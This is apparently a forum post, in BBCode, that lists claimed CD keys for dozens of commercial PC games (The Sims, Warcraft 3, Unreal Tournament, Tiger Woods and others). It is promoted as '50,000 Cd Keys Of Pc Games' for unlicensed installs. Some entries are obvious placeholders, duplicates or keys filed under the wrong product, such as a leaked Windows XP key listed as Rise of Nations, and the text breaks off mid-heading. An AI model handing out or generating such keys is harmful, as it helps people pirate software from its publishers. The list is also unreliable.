[b]5P66-4TZX9-3W7G1-91WRW-6Y30X[/b] [b]FSHG-W7L80-1Y2R9-HKRKZ-89XSV[/b] [b]Painkiller[/b] [b]----------------[/b] [b]3C37-E09F-8221-E4A6[/b] [b]8E96-E185-B765-583E[/b] [b]3DF2-AA3B-1E76-4F20[/b] [b]2013-38E6-4AE5-0A74[/b] [b]2CF0-E330-6D62-8791[/b] [b]Pearl Harbor Zero Hour[/b] [b]----------------[/b] [b]13FAA171-5FBC-4462-8AC2-2658727CE698[/b] [b]Project IGI-2[/b] [b]----------------[/b] [b]031F-F8D0-6536-B510[/b] [b]Project IGI-2: Covert Strike[/b] [b]----------------[/b] [b]70F4-AFA3-5374-3342[/b] [b]27A2-B504-9E22-C6AE[/b] [b]2325-7E35-0D25-1BE5[/b] [b]6C74-1833-AB64-CE02[/b] [b]FF72-9E82-C1F2-E5FC[/b] [b]Quake 3: Arena[/b] [b]----------------[/b] [b]7D3A-3GAB-3ADH-AA72-D7[/b] [b]GD2D-2CDG-L7DD-DGLL-2F[/b] [b]77LC-A33B-37L2-JGAC-E3[/b] [b]LBJ7-GBJ2-2AJG-3DDL-1F[/b] [b]HJA7-CBL2-HG7C-GAHD-2A[/b] [b]Return to Castle Wolfeinstein[/b] [b]----------------[/b] [b]CCWD-HCJG-SPAH-PCLJ-7E[/b] [b]CJLH-ACAC-CDPT-DDCS-25[/b] [b]CLAL-A7WJ-DTSJ-WARP-88[/b] [b]GWSG-ADCD-ALGH-LTLW-1F[/b] [b]SJDG-DCRG-GTPA-JHDC-2B[/b] [b]Rise of Nations[/b] [b]----------------[/b] [b]FCKGW-RHQO2-YXRKT-BTG6W-2BYQ8[/b] [b]RXVC3-B3347-DVG9X-FTFQF-9M7XT[/b] [b]RD4D4-B94XK-QVWFP-K9PJD-GVRV3[/b] [b]G4V6Q-VGHQR-DX2YB-XHCM3-YTF66[/b] [b]TYH8K-K648T-G9PRG-6RQB2-B3T3G[/b] [b]Rise of Nations: Thrones & Patriots[/b] [b]----------------[/b] [b]WW69F-K7BXC-P37BF-8VQ48-HY3FB[/b] [b]JGCYQ-9B747-4VQH4-G6BCU-YUIJU[/b] [b]Roller Coaster Tycoon 3[/b] [b]----------------[/b] [b]Q497-WQF8-KSNZ-AEA2-BUFM-9PRM[/b] [b]RLD6-6AHJ-AMVV-YTEF-CTAD-ZQQV[/b] [b]XA3D-FWP8-ULLK-S7J2-ETWN-45UL[/b] [b]RLDN-Y6SQ-G5ES-HWR7-CR4B-M8AC[/b] [b]RLDU-M24D-83CX-C8LZ-WDHS-ETND[/b] [b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b] [b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b] [b]50,000 Cd Keys Of Pc Games[/b] [b][/b][/b] [b]Rugby 2004[/b] [b]----------------[/b] [b]PXMM-YCAW-TGKZ-4F75-HL6V[/b] [b]P74L-JWA3-THBH-JVRE-VF5Z[/b] [b]PWK3-GDA4-TXCB-VB8P-KCQB[/b] [b]PD5V-Z5AW-TRXK-7U2H-DQHR[/b] [b]PU2S-DTA3-TLMH-47CP-5PQH[/b] [b]Savage: The Battle For Newerth[/b] [b]----------------[/b] [b]LB42-Z05V-VK9S-I7BM-58S5[/b] [b]UBS4-Y39C-B2D7-8SAF-H7C9[/b] [b]Shogun Total War[/b] [b]----------------[/b] [b]5996-3135972-7020316-2750[/b] [b]3494-3117019-4062694-5812[/b] [b]1097-1957141-7721126-2658[/b] [b]1453-9644381-3845463-4257[/b] [b]5675-3034428-9824789-3164[/b] [b]Shogun Total War: Mongol Invasion[/b] [b]----------------[/b] [b]2354-3824952-7553989-1873[/b] [b]1969-7725965-7171103-8026[/b] [b]3778-4915860-9836057-0320[/b] [b]0398-3307104-2497608-7156[/b] [b]1675-9487775-0776511-1211[/b] [b]Shogun Total War: Warlord Edition[/b] [b]----------------[/b] [b]5496-5739988-7541134-2314[/b] [b]8591-7585011-3889523-3172[/b] [b]9428-3704395-2811213-1516[/b] [b]2540-1104716-3008863-5304[/b] [b]5767-5317389-3681312-3446[/b] [b]Soldier of Fortune II: Double Helix[/b] [b]----------------[/b] [b]R4RM-8EWW-R77T-7W3M-AF[/b] [b]PFTE-H87X-E7F8-HWRF-FE[/b] [b]RFXT-4W88-3EKH-4FHW-5F[/b] [b]73J7-TRRK-JHHE-TXHE-45[/b] [b]4REM-E3EH-HXR3-X83T-62[/b] [b]Soldiers: Heroes of World War II[/b] [b]----------------[/b] [b]CBXP3Y-KY7JDK-RXW8TA-QA8UVU[/b] [b]JA8KAN-DL2CJZ-B5CHUN-5E75YS[/b] [b]PU5CGY-2VFKAC-N9Z85Z-3CYURQ[/b] [b]Soldner[/b] [b]----------------[/b] [b]DTTAS-TBERF-DRUCR-WEWR7[/b] [b]2S8SS-T5XPP-DB878-YRT4H[/b] [b]5BRD3-SESFW-8UR4T-2D2D7[/b] [b]WY35A-B96F5-ZWRH7-RWWH7[/b] [b]DSPSU-C2DRC-5BUA2-2HJEH[/b] [b]StarCraft[/b] [b]----------------[/b] [b]3627-12063-8616[/b] [b]1234-56789-1234[/b] [b]1998-00000-1997[/b] [b]1234-56789-0002[/b] [b]3535-87030-0179[/b] [b]StarCraft: Brood War[/b] [b]----------------[/b] [b]8617-78196-1896[/b] [b]2061-20299-0639[/b] [b]2859-65262-1030[/b] [b]Star Wars: Battlefront[/b] [b]----------------[/b] [b]BF0C-A77C-7457-8A98-SA40[/b] [b]6A50-15B8-DA9f-979C-NA40[/b] [b]44E5-2EEb-410A-1F78-JA40[/b] [b]f97C-1A37-0A7E-2AD7-SA40[/b] [b]D8A4-5978-459B-D24f-SA40[/b] [b]Star Wars: Republic Commando[/b] [b]----------------[/b] [b]8C55-9AA0-B502-7286-EU20[/b] [b]20CB-230B-2BB0-73C1-EU20[/b] [b]A9DB-3022-05A2-C4C0-EU20[/b] [b]065F-7430-FA28-1072-EU20[/b] [b]7A86-5288-B403-E629-EU20[/b] [b]Superbike 2001[/b] [b]----------------[/b] [b]6599-6744048-3296610-1069[/b] [b]9811-4399471-0608662-4430[/b] [b]5914-0190952-5297080-4361[/b] [b]1560-5964393-0191638-2829[/b] [b]6897-4942550-7701245-3809 [/b][/b] [b]Swat 3[/b] [b]----------------[/b] [b]LOS4-GAB8-ZEG8-XAN3-7325[/b] [b]XEP6-LAB2-NUP9-WAC2-5927[/b] [b]BAC2-BAB2-BAB2-BAB2-2352[/b] [b]LUS7-JAB4-TUG8-WEF6-4883[/b] [b]Swat 3: Close Quarters Battle[/b] [b]----------------[/b] [b]TER2-NAB8-PAB9-SEM7-5658[/b] [b]XEP7-CAB6-GEP3-DEM2-3757[/b] [b]Swat 3: Elite Edition[/b] [b]----------------[/b] [b]LYS4-MAB4-TYM7-REC3-3323[/b] [b]LYF7-FUB6-JEM5-NUD6-5854[/b] [b]LYF9-JUB4-BUM3-ZED7-9774[/b] [b]TED4-SAB4-DUB7-CYJ2-8652[/b] [b]DUB4-ZUC4-WEB3-LEC2-9947[/b] [b]Swat 4[/b] [b]----------------[/b] [b]LEB6-BAF6-DEG7-TEZ6-5344[/b] [b]DUT7-MEB5-FUB3-FUC6-3949[/b] [b]MYX9-PUW6-LUL4-BUG2-2683[/b] [b]TYC4-XUB6-ZYG2-LYR4-8698[/b] [b]GEC9-BEG5-MUX8-BEP8-5869[/b] [b]Terminator 3: War of the Machines[/b] [b]----------------[/b] [b]KGXP-C4SE-2M43-9XDK-FDEV[/b] [b]2LUC-S8NF-LWK3-E24S-2DEV[/b] [b]A8VM-9VQP-EQSE-NEY4-2DEV[/b] [b]Y6GQ-Q4AL-EJ4Y-3S6Y-GDEV[/b] [b]HETT-Y3ZL-9S4Z-J8JJ-ADEV[/b] [b]The Sims[/b] [b]----------------[/b] [b]100486-585530-905808-0928[/b] [b]105497-859214-224982-2841[/b] [b]100380-894345-537976-4619[/b] [b]100486-585530-905808-0928[/b] [b]150713-658127-750533-3021[/b] [b]The Sims: Deluxe Edition[/b] [b]----------------[/b] [b]5324-5883189-3168519-2745[/b] [b]5809-1600568-4466852-0132[/b] [b]2890-0494125-5982016-0417[/b] [b]9823-5334180-4607211-2204[/b] [b]3352-7191013-4602770-0912[/b] [b]The Sims: Living Large[/b] [b]----------------[/b] [b]1501-7545717-1091441-0391[/b] [b]1501-6866508-5905706-5454[/b] [b]5501-9036313-0444881-7172[/b] [b]8663-4966712-3945768-1934[/b] [b]4532-3121193-5104301-4938[/b] [b]The Sims: House Party[/b] [b]----------------[/b] [b]1500-5354306-2603693-5606[/b] [b]1502-2111302-2656399-1470[/b] [b]1505-7507332-5400384-5830[/b] [b]0901-4177371-2064872-3510[/b] [b]2500-1197387-6990762-4234[/b] [b]The Sims: Hot Date[/b] [b]----------------[/b] [b]4509-7813373-8688627-1670[/b] [b]4520-8696193-6180404-3409[/b] [b]7716-6059818-1424286-6030[/b] [b]2500-1758340-2632686-4208[/b] [b]1501-7709210-3634998-1949[/b] [b]The Sims: Vacation[/b] [b]----------------[/b] [b]1500-9874009-0973804-6601[/b] [b]1500-6766850-1565793-1840[/b] [b]4502-3691635-4925564-5919[/b] [b]4502-7138965-9125175-2412[/b] [b]5414-3558414-5169504-3313[/b] [b]The Sims: Unleashed[/b] [b]----------------[/b] [b]2500-0540593-1364233-0105[/b] [b]9932-1129289-4998838-6403[/b] [b]4500-4340504-5039624-5108[/b] [b]1500-3896457-1586058-7708[/b] [b]1501-6672127-6874113-7011[/b] [b]The Sims: Making Magic[/b] [b]----------------[/b] [b]BESA-WVUM-5C95-JNXY-VDEV[/b] [b]QAPX-CH4R-NYQS-YS4Y-UDEV[/b] [b]CQPX-X9EZ-SWNC-7GLN-CDEV[/b] [b]HFPP-429U-7EAN-HJ3G-RTWS[/b] [b]VSHR-ZLGZ-HXWP-EBVZ-KDEV[/b] [b]The Sims: Superstar[/b] [b]----------------[/b] [b]8640-6354650-5360929-5431[/b] [b]4662-8764186-9129013-5400[/b] [b]8159-9741155-6600844-1305[/b] [b]3816-8723326-4556354-1212[/b] [b]5813-4112330-4054715-6610[/b] [b]The Sims: Online[/b] [b]----------------[/b] [b]EKRR-B77T-2LHC-UVW8[/b] [b]9PZ5-9R4C-RUN6-3MQE[/b] [b]U53B-QNZU-3S2E-F6Y6[/b] [b]9A5E-2A68-EF2A-EXR5[/b] [b]8SJM-M87Q-FTLY-3TXN[/b] [b]The Sims 2[/b] [b]----------------[/b] [b]BKUL-CS68-J6AT-37Y7-KX4F[/b] [b]374U-U5GT-1RZ9-4PDG-T5QZ[/b] [b]DKSS-YCA2-ZO11-SSP7-3AFH[/b] [b]XUT3-6LHW-ZOR1-JH7N-VV7I[/b] [b]DWJ2-Q92Z-R1R1-5F6R-077P[/b] [b]The Sims 2: University[/b] [b]----------------[/b] [b]CFD5-H2VX-MVNG-PG81-N4D4[/b] [b]R44C-HRNL-VUCT-8WAZ-U1G9[/b] [b]6PFX-W8AH-MVNG-X90X-F4JH[/b] [b]SPQQ-KC0R-NVNG-ZB8D-K4A4[/b] [b]IENW-DVBZ-YVNG-RO3O-A4ET[/b] [b]The Lord of The Rings: The Battle For Middle-Earth[/b] [b]----------------[/b] [b]CTJ2-P7UQ-KCQY-FJDL-6BZ5[/b] [b]PWDM-7UN5-8K3G-YZLS-RSDX[/b] [b]SBYG-287U-NRBH-WWCL-HE8J[/b] [b]VUKT-G8J9-ZV2N-AX8K-EN8Z[/b] [b]RQRR-MSQQ-QC6A-9URN-L544[/b] [b]The Lord of The Rings: The Return of The King[/b] [b]----------------[/b] [b]FBG8-MMAS-457W-BP36-QWBN[/b] [b]FBXF-4W93-TG36-CV4M-XXUV[/b] [b]3ZNW-633G-TP9Q-NBVH-8QTE[/b] [b]KYE6-RUPA-W2VC-AF83-AXQL[/b] [b]TMX7-JZ3N-6V2Z-WC5X-B9TL[/b] [b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b] [b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b] [b]50,000 Cd Keys Of Pc Games[/b] [b]The Lord of The Rings: War of the Ring[/b] [b]----------------[/b] [b]BUT2-JET4-MED8-PUB7-3253[/b] [b]JAJ6-SUF9-XAM6-JUJ3-4884[/b] [b]JAF9-DAW7-SEG8-GUR4-9922[/b] [b]XEP8-JUM5-DYL7-ZYR2-6283[/b] [b]CYS7-DYW5-NEF5-CEX4-4325[/b] [b]Theme Park Inc.[/b] [b]----------------[/b] [b]7523-0750352-4120976-1794[/b] [b]5222-9477431-5422750-3880[/b] [b]6270-9300423-0980242-3706[/b] [b]6713-6284510-9024055-7116[/b] [b]1951-6442621-6463672-6301[/b] [b]Throne of Darkness[/b] [b]----------------[/b] [b]XUR5-LAB4-XEC3-FuZ6-7287[/b] [b]XUR9-DEB2-DUC3-NUF2-4483[/b] [b]RAC2-RAD2-RAC2-RAC2-3387[/b] [b]NYF9-FEB4-WEN8-PYS3-2228[/b] [b]LAD8-NAB4-WYB2-CAT2-8667[/b] [b]Tien[/b] [b]----------------[/b] [b]KSW003-351467-324580-157236[/b] [b]KSW003-062688-348450-870938[/b] [b]KSW003-632553-850453-715567[/b] [b]KSW003-808343-147486-103467[/b] [b]KSW003-542465-235481-001066[/b] [b]Tiger Woods PGA Tour 2002[/b] [b]----------------[/b] [b]1740-7476429-1752366-6480[/b] [b]9263-8148731-8684392-6910[/b] [b]8213-8231840-4917906-5849[/b] [b]3040-7691245-7982216-3351[/b] [b]2266-1247823-3431838-4665[/b] [b]Tiger Woods PGA Tour 2003[/b] [b]----------------[/b] [b]DUDC-B7SY-XXMX-HFTW[/b] [b]RNJR-XBTX-8YCY-CZJL[/b] [b]WPKN-H5DT-FB2A-NTDY[/b] [b]RD4L-MJED-825R-PP26[/b] [b]XHCM-YVSN-P6S7-G7JD[/b] [b]Tiger Woods PGA Tour 2004[/b] [b]----------------[/b] [b]TKGY-8ST4-191R-TFHL-SM4J[/b] [b]FW5V-EGBM-1191-YZ5L-JPK2[/b] [b]BB2A-2AVS-119R-PP9Z-KUYJ[/b] [b]JTQ8-TX0R-911Z-PZ0X-14A2[/b] [b]E66E-UJUM-R1Z1-HUT0-HVEY[/b] [b]Tiger Woods PGA Tour 2005[/b] [b]----------------[/b] [b]ZLC4-MALB-DGQP-CHA8-DRLD[/b] [b]6C99-4VLZ-QPZV-5AU3-WRLD[/b] [b]UZ66-PCWS-4ELP-7E4E-7RLD[/b] [b]B9QQ-VGUV-9SBA-UTT5-KRLD[/b] [b]VXVM-2WDW-PVRM-A9NH-WRLD[/b] [b]Tony Hawk\'s UnderGround 2[/b] [b]----------------[/b] [b]2FRC-CT3K-2YKK-RKGY-C62B[/b] [b]AURK-CRKY-T2A5-CGTX-D436[/b] [b]3CRG-R35K-TK2G-RU35-07F1[/b] [b]KMY5-M3A8-XU25-22RG-8AC8[/b] [b]22U8-ABXU-22YK-CX2G-3C37[/b] [b]Trainz[/b] [b]-------[/b] [b]RAZO-R99F-QPVR-8W4W-XFF8-MC9Z[/b] [b]RAZO-R9WF-XV5X-EK69-Y8H2-5MI5[/b] [b]RAZO-R90B-8CMO-Q3LC-3NX8-OHVH[/b] [b]RAZO-R919-LWEE-AGMQ-5S1T-VXC1[/b] [b]RAZO-R9K6-FGCH-6B05-6WVH-56YX[/b] [b]Tron 2.0[/b] [b]----------------[/b] [b]NP3T-C6BR-B4C2-7R36-N996[/b] [b]5NTC-NCTB-N6BP-28TL-BC7L[/b] [b]35BC-T6NC-Y678-3YBN-LYNN[/b] [b]6B6Y-YT48-PPT9-NL6P-6P5P[/b] [b]7LBB-TR58-8393-RNB7-T8N7[/b] [b]Triple Play Baseball[/b] [b]----------------[/b] [b]8460-8035283-2715299-7813[/b] [b]1683-4291440-2555051-0089[/b] [b]5066-4548454-6755449-4360[/b] [b]6104-0082423-4715400-2449[/b] [b]9453-1015799-4202831-2666[/b] [b]UEFA Euro 2004[/b] [b]----------------[/b] [b]U899-HZ4V-2S7E-8Y5N-P93Q[/b] [b]VMLC-9GFL-73JE-SK4W-SSL8[/b] [b]NY22-RF29-CH6C-9SZ7-NL6V[/b] [b]YSP7-CGCB-SEF5-U4EF-52RU[/b] [b]CWBB-CV6X-824W-GW3R-R2RA[/b] [b]Unreal Tournament 2003[/b] [b]----------------[/b] [b]EPPPW-KTH8G-BANDU-N397J[/b] [b]EKBD7-BNG9Y-BBDE9-PGER2[/b] [b]FEDFY-LVPEL-AYWNE-MU978[/b] [b]G6E83-YB7AF-BER9D-TQEBK[/b] [b]XHGLB-VLMLA-BBHM6-CVZTX[/b] [b]Unreal Tournament 2004[/b] [b]----------------[/b] [b]WMDYD-WJH2Z-AP7KG-ADB3T[/b] [b]UPE4C-3G97W-AGK2X-7ZB83[/b] [b]F36DV-DKNH7-ACK2K-2Z78T[/b] [b]2CY2T-XCMH8-ABPQL-L2QDH[/b] [b]XM4EL-DGB27-AGPNH-748UB[/b] [b]Virtual Railroad 3[/b] [b]----------------[/b] [b]22F9-E1SA-2KW6-H5T4[/b] [b]2H2P-2MRG-IH9K-MMFH[/b] [b]2GU9-A2HB-2ED3-53GE[/b] [b]A3K9-A4N7-28D1-G1R7[/b] [b]EFK1-IBM3-A5LC-E8H1[/b] [b]Warcraft 3[/b] [b]----------------[/b] [b]N9UBI4-GRQS-TDV29O-QF8H-7SMKLM[/b] [b]1YREOT-636V-59GAGA-8SYH-7FBJ43[/b] [b]JAXDO1-2Z6F-G7NZTI-H0QK-BE543P[/b] [b]CFMOSV-X0WD-U17ITP-RVPR-UTX4YP[/b] [b]QA1GX3-2UBS-6BM34T-Z7NO-P0H2W5[/b] [b]Warcraft 3: The Frozen Throne[/b] [b]----------------[/b] [b]WGMNX2-EGT7-8KD9EV-H6ZR-ZPH7PZ[/b] [b]B47XWP-VTNP-HHXZZF-DJ4B-MMFGPX[/b] [b]ZP944Z-8W4D-FJ4YCR-GGYV-2F6DHE[/b] [b]8NBFN2-KZHW-CXGJTM-2CJ4-FH4GWB[/b] [b]ETHTR9-FM7Z-DN84YW-F2JB-2DHMVY[/b] [b]Warhammer 40k: Dawn of War[/b] [b]----------------[/b] [b]4806-2A50-6E56-F843[/b] [b]0D20-4518-FDE6-0748[/b] [b]04C2-33AA-5DDB-5B2A[/b] [b]7EAC-26E7-50FA-AA21[/b] [b]CCFE-401F-BFD0-7287[/b] [b]ZanZarah: The Hidden Portal[/b] [b]----------------[/b] [b]1LPL-9F81-LINR-60NU-XDXE[/b] [b]1F57-7JJ3-UHN3-P0PA-ZXED[/b] [b]18NB-1SEG-1INU-CETJ-2SOT[/b] [b]1PLD-8D4M-N9B7-8T9E-WTMF[/b] [b]1ZK4-ONEM-XNH8-PISY-WL6V[/b] [b]Harry Potter And The Prisoner Of Azkaban:[/b] [b]GLYQ-AYYW-6CST-VXDK-3DEV[/b] [b]9RLL-Q5TF-BS3J-34AG-RDEV[/b] [b]RPKB-2N57-RDGU-8CW5-9DEV[/b] [b]HUSA-YX5T-6AG4-BL3E-6DEV[/b] [b]RAP7-U5JQ-94N3-DGY5-RDEV[/b] [b]------------[/b] [b]FIFA/UEFA Euro 2004:[/b] [b]V8G8-2LF8-CJKD-M6C3-CDEV[/b] [b]E7MD-QS48-VDGQ-E76C-PDEV[/b] [b]MS2A-EB3K-ZMDW-VYX5-XDEV[/b] [b]ZWTB-KD3U-HSVF-6BGA-ZDEV[/b] [b]3CC4-GFBC-RBS5-C2S7-ZDEV[/b] [b]3GWW-29QP-CY3W-FS3Q-FDEV[/b] [b]8BEN-9HYW-4YZ3-Z468-ZDEV[/b] [b]DHKT-7Y2D-VDLM-35G8-PDEV[/b] [b]5CWE-Y94G-2A48-S388-6DEV[/b] [b]UNYG-4EUL-X7WK-HNHE-LDEV[/b] [b]------------[/b] [b]Painkiller:[/b] [b]4748-0c40-6813-15f0[/b] [b]f95d-5105-fa92-a706[/b] [b]68df-9010-33d4-6e82[/b] [b]------------[/b] [b]Dead Mans Hand:[/b] [b]DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3K[/b] [b]DEVT-8YKJ-CGFE-H5H5-QD43-PX2X[/b] [b]DEVV-XUEA-CM78-YUNP-56JL-NFDS[/b] [b]DEVD-NRRN-LS4Y-RTXT-XMCT-QVQR[/b] [b]DEVR-QTBF-GAW4-S5X5-TZPD-W7EJ[/b] [b]DEVF-27TY-A5L3-VUX2-MWDM-PVSK[/b] [b]------------[/b] [b]Unreal Tournament 2004:[/b] [b]GTXF9-XJPT6-APK6W-DDMPM[/b] [b]AJLYX-F9QEA-AJV2Z-AM82B[/b] [b]PW3NB-399WG-ABLYN-DLDLE[/b] [b]BattleField: Vietnam:[/b] [b]V2W6-54VJ-9R11-XJPU-79CM[/b] [b]935V-BL3H-1ZRR-PESW-9HGK[/b] [b]NQFX-XSBQ-R1R9-VW47-G2VW[/b] [b]YMAJ-7X2T-991R-5G8C-6RJC[/b] [b]6Q7X-VP1T-1R1Z-VZX0-NP2N[/b] [b]CESA-VN0G-1RR1-K8VS-G6M3[/b] [b]EZ2J-BVU9-11R1-87PN-CDAL[/b] [b]EYKB-ADLR-19R9-V04D-C5H6[/b] [b]2VQY-EFVZ-1119-907X-EU18[/b] [b]7ZB3-FQYK-9111-6CS7-0060[/b] [b]------------[/b] [b]Delta Force: Black Hawk Down Team Sabre[/b] [b]S8VS-RKRH-8J9J-9G6N-5S7S[/b] [b]AJWN-CE28-4H8N-92G8-CHEQ[/b] [b]SURN-JDCN-BWKR-5ENK-9TH4[/b] [b]SD9C-5EUZ-FV38-C88U-7Y9C[/b] [b]A4NV-Y362-AFLR-ZKKB-C288[/b] [b]SPNK-6JZZ-DRM3-Q9S5-8MXH[/b] [b]------------[/b] [b]Dominions II: The Ascension Wars[/b] [b]2531-8943-1111-690[/b] [b]------------[/b] [b]SpellForce: the Order of Dawn[/b] [b]08AFX-CGGML-W260D-5RRPO-CVNFD[/b] [b]------------[/b] [b]Neverwinter Nights: Hordes of the Underdark[/b] [b]BBWLB-FOQLC-3HB2L-UKRNM-Q9YXG-N842W-0Y7V3[/b] [b]------------[/b] [b]Total Club Manager 2004:[/b] [b]WR5M-3RJD-ECWN-YYWY-QDEV[/b] [b]C933-S2AA-SQJG-6GS6-2DEV[/b] [b]GPZH-BGEW-3QA5-RES2-GDEV[/b] [b]9X6W-JD8T-ZB6K-NPK3-FDEV[/b] [b]RPMD-YZFF-BWJF-DW5K-BDEV[/b] [b]------------[/b] [b]Terminator 3: War of the Machines[/b] [b]DEVS-FJKY-SR5J-AN7Z[/b] [b]DEV2-SSE8-8DWT-5NBZ[/b] [b]DEVV-STUQ-S6PL-Y49P[/b] [b]DEVG-M8SF-YH2J-7ABZ[/b] [b]DEV4-3WJR-D3VF-84BJ[/b] [b]DEV6-VPT8-YDL6-8CN7[/b] [b]NBA Live 2004 Cdkey[/b] [b]GBNE-CF84-BSAM-28QV-UDEV[/b] [b]NWCC-JQGF-WS64-XQCQ-NDEV[/b] [b]C3WE-HQL4-4AX5-MUSE-CDEV[/b] [b]------------[/b] [b]Magic The Gathering: Battlegrounds[/b] [b]8DEV-NG6A-3B26-2EKL-LJWY-LNNB[/b] [b]------------[/b] [b]No One Lives Forever 2: Contract JACKASS[/b] [b]XYR9-FEB6-CYP5-NUG3-7248[/b] [b]------------[/b] [b]Lord of the Rings: War of the Ring[/b] [b]XUF5-JUB2-JAB8-JUD3-4947[/b] [b]------------[/b] [b]CALL OF DUTY:[/b] [b]T3W8-343X-T82W-T3T3-BAD2[/b] [b]3TX4-4X8H-UP2E-P834-FF82[/b] [b]43DK-8S2Y-3UTU-U348-7CEC[/b] [b]8H2T-SUD2-HD4D-WE8S-1EDB[/b] [b]KWYE-X8DD-SHKT-2GKX-E544[/b] [b]------------[/b] [b]FIFA 2004:[/b] [b]7U44-FACX-443H-ANE4-LDEV[/b] [b]JF8Y-Z9Y2-8S46-A44N-NDEV[/b] [b]6KSS-KREK-L66J-BGN4-8DEV[/b] [b]U2ZH-5BSQ-W4QY-6QYN-4DEV[/b] [b]S8YY-7RA6-WCW4-5JJS-CDEV[/b] [b]SCE6-8EY2-WNUG-7888-2DEV[/b] [b]GJEE-JPSA-AEC6-WY6C-4DEV[/b] [b]AFUC-2Z9U-HN6P-RPD6-ADEV[/b] [b]VBKT-RNKF-4L4F-QE4N-7DEV[/b] [b]U4EE-NP2P-TAKP-S9AT-6DEV[/b] [b]------------[/b] [b]Harry Potter: Quidditch World Cup[/b] [b]3FJA-LVDF-DAJP-34HR-RDEV[/b] [b]MSEE-5EL4-WYBB-DGLU-GDEV[/b] [b]6Q7F-WAAC-8QTH-WLC4-EDEV[/b] [b]Q3N6-2X4N-A4EA-NY64-GDEV[/b] [b]GJGQ-4SLL-EA4Y-FJSU-UDEV[/b] [b]5LM5-M22H-45YT-W88Z-2DEV[/b] [b]C6U4-7A49-4CE2-MUGL-8DEV[/b] [b]BH4U-GCNX-WMJ8-ZGKY-4DEV[/b] [b]KAU4-AVFV-34AK-782Y-4DEV[/b] [b]Y3QQ-TUGW-4NU4-ZG68-6DEV[/b] [b]Hint:If you need a key and think that this list is too long and find it difficult to search..[/b] [b]Hit CRTL+F and type in the name of the Game,you\'ll be there[/b] [b]50,000 Cd Keys Of Pc Games[/b] [b][/b][/b] [b]Empires: Dawn of the Modern World[/b] [b]XG4H-A893-TZ9W-98A4-B063[/b] [b]CT4G-TJP3-4XAT-N4TK- 52E[/b] [b]CNTK-HK39-A3GN-KGZG-AB2C[/b] [b]------------[/b] [b]Hidden and Dangerous 2:[/b] [b]1234-5678-9abc-dddf[/b] [b]------------[/b] [b]Halo: Combat Evolved[/b] [b]CHKGP-K4KWV-FQQ9G-XHVHM-RVMD8[/b] [b]------------[/b] [b]Judge Dredd: Dredd Vs. Death[/b] [b]NUN6-GAB2-TAX7-ZYG6-3537[/b] [b]------------[/b] [b]The Sims: Makin Magic[/b] [b]BESA-WVUM-5C95-JNXY-VDEV[/b] [b]VSHR-ZLGZ-HXWP-EBVZ-KDEV[/b] [b]ETKB-D748-8W4J-D2A4-ADEV[/b] [b]JC3T-5Z4V-G4GG-5U8U-6DEV[/b] [b]J8YG-9B7H-7FLT-BNDX-9DEV[/b] [b]CQPX-X9EZ-SWNC-7GLN-CDEV[/b] [b]EW3B-ZUSF-8CYJ-4EEN-2DEV[/b] [b]QAPX-CH4R-NYQS-YS4Y-UDEV[/b] [b]AWRR-GRZ3-A3LV-RD8H-TDEV[/b] [b]TQKK-Y29X-4Z64-T3P2-CDEV[/b] [b]------------[/b] [b]Once Upon A Knight:[/b] [b]RBHE-9ZBU-U7AU-QMUV[/b] [b]------------[/b] [b]Freedom Fighters:[/b] [b]PQGY-4FAQ-TMQ5-Q4X8-KXCS[/b] [b]P4QQ-T5AQ-T6SD-F5F7-R79V[/b] [b]PZ3K-4NAQ-TPZT-Z6WU-ZD2W[/b] [b]PZ3K-4NAQ-TPZT-Z6WU-ZD2W[/b] [b]PW6W-3LAA-TMSA-NBBP-YHCV[/b] [b]P866-C4AX-THLC-LGNB-2LWN[/b] [b]PGC4-SWA7-T7XN-BU6Y-A6BW[/b] [b]------------[/b] [b]Tiger Woods PGA Tour 2004:[/b] [b]YPZ9-QPT5-5TJL-ASLA-EDUM[/b] [b]QYRH-7YJG-T2LR-DRN2-WSER[/b] [b]JN6E-RUEU-Y5A9-2YCS-NNYB[/b] [b]F4BT-KZ33-DTDW-WABH-74AK[/b] [b]A9JA-ND2S-4SGQ-TS44-A4CJ[/b] [b]W7JS-UPQ2-NRJA-DH58-QJ4H[/b] [b]WFFF-QES4-YUJL-PNGE-42WQ[/b] [b]S2R9-JUYM-WGC8-7EWW-YYAE[/b] [b]4VJ2-KGWG-UASC-ZYC2-8N8E[/b] [b]S9JJ-CUZK-SCD6-TCN6-Z4EV[/b] [b]Medal of Honor: Allied Assault Breakthrough[/b] [b]L5KB-32WY-B6G5-6747-YQ49[/b] [b]ADL4-HFJD-E38B-5AYG-8WLV[/b] [b]93LL-HUB4-XKFC-EGXT-2LG5[/b] [b]UM6W-H75N-67D6-PG8H-THGJ[/b] [b]CN99-A94W-Q2JG-4K3Q-44EK[/b] [b]52MV-ZYNC-8RM3-L5M5-2YWG[/b] [b]42RH-PNLU-J2R2-TDA9-K4Z2[/b] [b]BY7X-ZA8G-7TE2-GDT4-3J39[/b] [b]WWDD-K4T5-SLF2-DLN2-D4AK[/b] [b]WDBT-NTLK-DEBT-N44R-LU8C[/b] [b]------------[/b] [b]NHL 2004:[/b] [b]6T22-8L62-6666-8666-6666[/b] [b]FQ22-BXTP-FLT!-ELT!-FLT![/b] [b]CHYQ-AVKH-CRKD-GRKD-CRKD[/b] [b]BZ8G-WCOL-L8JD-SUXM-LTBV[/b] [b]A75V-8YSW-JQ75-NE79-LC4W[/b] [b]ZZGY-JQVB-PJ4T-6K6K-4INY[/b] [b]B233-BN2E-BUL3-87C5-4YZA[/b] [b]AWZH-HVNV-P8FK-XHPQ-8EUJ[/b] [b]J4LL-PZID-QZEM-RPQ2-UHRF[/b] [b]RKRR-R3C4-QWP8-QUXI-96KC[/b] [b]------------[/b] [b]Sim City 4: Rush Hour[/b] [b]CLC4-5ZU8-6C4S-9W46-LS4E[/b] [b]8KN6-M5WS-PSWT-WDSF-4J4H[/b] [b]UV8Y-U7CE-G6W2-44CN-S8JG[/b] [b]ZPXP-ZPTX-7THC-6C5M-54C3[/b] [b]L44L-M3NU-4EUS-6866-S62G[/b] [b]2ZZR-MP29-2222-H222-2222[/b] [b]CFWN-LZJE-46WA-JQG2-SUCC[/b] [b]63A2-WT4M-G2Z5-XR8Z-9SF4[/b] [b]M5R9-MLYC-VFQD-2MMC-KGK2[/b] [b]NMMD-QET5-WADQ-SA48-KW4P[/b] [b]Command and Conquer 